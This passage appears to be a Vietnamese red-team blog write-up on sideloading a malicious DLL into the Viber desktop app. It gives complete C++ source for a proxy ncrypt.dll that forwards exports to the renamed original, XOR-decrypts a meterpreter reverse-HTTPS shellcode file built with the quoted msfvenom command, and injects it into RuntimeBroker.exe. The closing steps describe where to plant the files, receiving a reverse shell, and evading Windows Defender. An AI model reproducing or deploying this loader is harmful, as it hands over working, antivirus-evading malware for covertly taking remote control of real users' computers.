#pragma comment(linker, "/export:NCryptStreamUpdate=ncrypts.NCryptStreamUpdate,@99")
#pragma comment(linker, "/export:NCryptTranslateHandle=ncrypts.NCryptTranslateHandle,@100")
#pragma comment(linker, "/export:NCryptUnprotectKey=ncrypts.NCryptUnprotectKey,@101")
#pragma comment(linker, "/export:NCryptUnprotectSecret=ncrypts.NCryptUnprotectSecret,@102")
#pragma comment(linker, "/export:NCryptVerifyClaim=ncrypts.NCryptVerifyClaim,@103")
#pragma comment(linker, "/export:NCryptVerifySignature=ncrypts.NCryptVerifySignature,@104")
#pragma comment(linker, "/export:SslChangeNotify=ncrypts.SslChangeNotify,@105")
#pragma comment(linker, "/export:SslComputeClientAuthHash=ncrypts.SslComputeClientAuthHash,@106")
#pragma comment(linker, "/export:SslComputeEapKeyBlock=ncrypts.SslComputeEapKeyBlock,@107")
#pragma comment(linker, "/export:SslComputeFinishedHash=ncrypts.SslComputeFinishedHash,@108")
#pragma comment(linker, "/export:SslComputeSessionHash=ncrypts.SslComputeSessionHash,@109")
#pragma comment(linker, "/export:SslCreateClientAuthHash=ncrypts.SslCreateClientAuthHash,@110")
#pragma comment(linker, "/export:SslCreateEphemeralKey=ncrypts.SslCreateEphemeralKey,@111")
#pragma comment(linker, "/export:SslCreateHandshakeHash=ncrypts.SslCreateHandshakeHash,@112")
#pragma comment(linker, "/export:SslDecrementProviderReferenceCount=ncrypts.SslDecrementProviderReferenceCount,@113")
#pragma comment(linker, "/export:SslDecryptPacket=ncrypts.SslDecryptPacket,@114")
#pragma comment(linker, "/export:SslDeriveSessionTicketKey=ncrypts.SslDeriveSessionTicketKey,@115")
#pragma comment(linker, "/export:SslDuplicateTranscriptHash=ncrypts.SslDuplicateTranscriptHash,@116")
#pragma comment(linker, "/export:SslEncryptPacket=ncrypts.SslEncryptPacket,@117")
#pragma comment(linker, "/export:SslEnumCipherSuites=ncrypts.SslEnumCipherSuites,@118")
#pragma comment(linker, "/export:SslEnumCipherSuitesEx=ncrypts.SslEnumCipherSuitesEx,@119")
#pragma comment(linker, "/export:SslEnumEccCurves=ncrypts.SslEnumEccCurves,@120")
#pragma comment(linker, "/export:SslEnumProtocolProviders=ncrypts.SslEnumProtocolProviders,@121")
#pragma comment(linker, "/export:SslExpandBinderKey=ncrypts.SslExpandBinderKey,@122")
#pragma comment(linker, "/export:SslExpandExporterMasterKey=ncrypts.SslExpandExporterMasterKey,@123")
#pragma comment(linker, "/export:SslExpandNextGenTrafficKey=ncrypts.SslExpandNextGenTrafficKey,@124")
#pragma comment(linker, "/export:SslExpandPreSharedKey=ncrypts.SslExpandPreSharedKey,@125")
#pragma comment(linker, "/export:SslExpandResumptionMasterKey=ncrypts.SslExpandResumptionMasterKey,@126")
#pragma comment(linker, "/export:SslExpandTrafficKeys=ncrypts.SslExpandTrafficKeys,@127")
#pragma comment(linker, "/export:SslExpandWriteKey=ncrypts.SslExpandWriteKey,@128")
#pragma comment(linker, "/export:SslExportKey=ncrypts.SslExportKey,@129")
#pragma comment(linker, "/export:SslExportKeyingMaterial=ncrypts.SslExportKeyingMaterial,@130")
#pragma comment(linker, "/export:SslExtractEarlyKey=ncrypts.SslExtractEarlyKey,@131")
#pragma comment(linker, "/export:SslExtractHandshakeKey=ncrypts.SslExtractHandshakeKey,@132")
#pragma comment(linker, "/export:SslExtractMasterKey=ncrypts.SslExtractMasterKey,@133")
#pragma comment(linker, "/export:SslFreeBuffer=ncrypts.SslFreeBuffer,@134")
#pragma comment(linker, "/export:SslFreeObject=ncrypts.SslFreeObject,@135")
#pragma comment(linker, "/export:SslGenerateMasterKey=ncrypts.SslGenerateMasterKey,@136")
#pragma comment(linker, "/export:SslGeneratePreMasterKey=ncrypts.SslGeneratePreMasterKey,@137")
#pragma comment(linker, "/export:SslGenerateSessionKeys=ncrypts.SslGenerateSessionKeys,@138")
#pragma comment(linker, "/export:SslGetCipherSuitePRFHashAlgorithm=ncrypts.SslGetCipherSuitePRFHashAlgorithm,@139")
#pragma comment(linker, "/export:SslGetKeyProperty=ncrypts.SslGetKeyProperty,@140")
#pragma comment(linker, "/export:SslGetProviderProperty=ncrypts.SslGetProviderProperty,@141")
#pragma comment(linker, "/export:SslGetSessionTicketProtectionHeaderSize=ncrypts.SslGetSessionTicketProtectionHeaderSize,@142")
#pragma comment(linker, "/export:SslHashHandshake=ncrypts.SslHashHandshake,@143")
#pragma comment(linker, "/export:SslImportKey=ncrypts.SslImportKey,@144")
#pragma comment(linker, "/export:SslImportMasterKey=ncrypts.SslImportMasterKey,@145")
#pragma comment(linker, "/export:SslIncrementProviderReferenceCount=ncrypts.SslIncrementProviderReferenceCount,@146")
#pragma comment(linker, "/export:SslLookupCipherLengths=ncrypts.SslLookupCipherLengths,@147")
#pragma comment(linker, "/export:SslLookupCipherSuiteInfo=ncrypts.SslLookupCipherSuiteInfo,@148")
#pragma comment(linker, "/export:SslOpenPrivateKey=ncrypts.SslOpenPrivateKey,@149")
#pragma comment(linker, "/export:SslOpenProvider=ncrypts.SslOpenProvider,@150")
#pragma comment(linker, "/export:SslProtectSessionTicket=ncrypts.SslProtectSessionTicket,@151")
#pragma comment(linker, "/export:SslSignHash=ncrypts.SslSignHash,@152")
#pragma comment(linker, "/export:SslUnprotectSessionTicket=ncrypts.SslUnprotectSessionTicket,@153")
#pragma comment(linker, "/export:SslVerifySignature=ncrypts.SslVerifySignature,@154")


// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll

BOOL LoadNtdllFunctions() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");

    ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
    if (ZwOpenProcess == NULL) return FALSE;

    ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
        GetProcAddress(ntdll, "ZwCreateSection");
    if (ZwCreateSection == NULL) return FALSE;

    NtMapViewOfSection = (NTSTATUS(NTAPI*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
        GetProcAddress(ntdll, "NtMapViewOfSection");
    if (NtMapViewOfSection == NULL) return FALSE;

    ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
        GetProcAddress(ntdll, "ZwCreateThreadEx");
    if (ZwCreateThreadEx == NULL) return FALSE;

    NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
    if (NtDelayExecution == NULL) return FALSE;


    ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
    if (ZwClose == NULL) return FALSE;

    return TRUE;
}

HANDLE getProcHandlebyName(const char* procName) {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    NTSTATUS status = NULL;
    HANDLE hProc = 0;

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(snapshot, &entry)) {
        do {
            if (strcmp((entry.szExeFile), procName) == 0) {
                OBJECT_ATTRIBUTES oa;
                CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
                InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
                // 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
                status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);

                if (!NT_SUCCESS(status)) {
                    continue;
                }
                return hProc;
            }
        } while (Process32Next(snapshot, &entry));
    }
    ZwClose(snapshot);

    return NULL;
}

// credit: Sektor7 RTO Malware Essential Course 
void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    int j;

    j = 0;
    for (int i = 0; i < data_len; i++) {
        if (j == key_len - 1) j = 0;

        data[i] = data[i] ^ key[j];
        j++;
    }
}


DWORD WINAPI DoMagic(LPVOID lpParameter)
{
    if (LoadNtdllFunctions() == FALSE) {
        printf("[-] Failed to load NTDLL function\n");
        return -1;
    }

    // 1. Enumerate all process and locate process for RuntimeBroker.exe 
    // https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
    HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
    if (hProc == NULL) {
        exit(0);
    }

    // 2. Read the payload file viber.bin from the current working directory.
    // msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip> lport=<port> f raw -o viber.bin exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread
    FILE* fp;
    size_t shellcodeSize;
    unsigned char* shellcode;
    fp = fopen("viber.bin", "rb");
    fseek(fp, 0, SEEK_END);
    shellcodeSize = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    shellcode = (unsigned char*)malloc(shellcodeSize);
    fread(shellcode, shellcodeSize, 1, fp);

    char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";

    // 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
    XOR((char*)shellcode, shellcodeSize, key, sizeof(key));

    HANDLE hSection = NULL;
    NTSTATUS status = NULL;
    SIZE_T size = 4096;
    LARGE_INTEGER sectionSize = { size };
    PVOID pLocalView = NULL, pRemoteView = NULL;
    SIZE_T scLength = sizeof(shellcode);
    int viewUnMap = 2;

    // 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
    if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
        return -1;
    }

    // 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
    if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
        &pLocalView, NULL, NULL, NULL,
        &size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
        return -1;
    }

    // Use for in-file shellcode 
    //memcpy(pLocalView, shellcode, sizeof(shellcode));

    // Use for on-disk shellcode 
    memcpy(pLocalView, shellcode, shellcodeSize);

    // 6. Second call maps the contents into the Runtimebroker.exe memory space.
    if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
        &size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
        return -1;
    }

    // 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
    LARGE_INTEGER interval;
    interval.QuadPart = -1 * (int)(4270 * 10000.0f);
    if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
        printf("[-] Cannot delay execution. Error code: %08X\n", status);
        return -1;
    }

    // 8. Call the Windows API NtCreateThreadEx.
    HANDLE hThread = NULL;
    if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
        return -1;
    }

    ResumeThread(hThread);

    // 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
    interval.QuadPart = -1 * (int)(4270 * 10000.0f);
    if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
        printf("[-] Cannot delay execution. Error code: %08X\n", status);
        return -1;
    }

    // 10. Finished. 
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // https://gist.github.com/securitytube/c956348435cc90b8e1f7
        // Create a thread and close the handle as we do not want to use it to wait for it 
        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
        CloseHandle(threadHandle);

    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        Sleep(5000);
        break;
    }
    return TRUE;
}

Mình nghĩ là hoàn toàn có thể ghi luôn shellcode vào trong code trên, tuy nhiên để tiện thì mình cứ để như này luôn, cũng như sẽ không sử dụng vmprotect.

Compile và ra được file ncrypt.dll cần dùng

Giờ thì tổng cộng chúng ta có 3 file:

  • viber.bin: là shellcode meterpreter

  • ncrypts.dll: file dll gốc

  • ncrypt.dll: file dll sideload sử dụng để load shellcode cũng như import các function từ file dll gốc

Dựa trên kết quả của procmon, ta sẽ copy cả 3 file này vào C:\Users\Detec\AppData\Local\Viber:

Exploit:

Set up listener:

Do khi test là máy ảo nên user sẽ là TrungPQ6

Khi chạy Viber, ta thấy cả 2 file dll đều đã được load thành công

Metasploit đã nhận được meterpreter reverse shell.

Windows Defender cũng không bắt được gì